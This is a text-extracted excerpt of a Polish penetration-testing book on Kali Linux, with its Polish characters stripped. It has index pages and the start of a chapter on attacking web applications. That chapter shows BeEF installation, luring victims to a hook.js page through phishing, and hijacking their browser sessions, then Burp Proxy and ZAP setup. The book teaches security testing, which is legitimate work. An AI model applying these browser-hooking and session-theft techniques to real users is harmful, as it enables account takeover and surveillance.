poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Spis tre ci
7
Rozdzia 8 Tworzenie raportoacutew ko cowych 301
Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307
Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319
Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323
Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327
Podsumowanie 327
Skorowidz 329
Kup książkę Poleć książkę
Spis tre ci
8
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
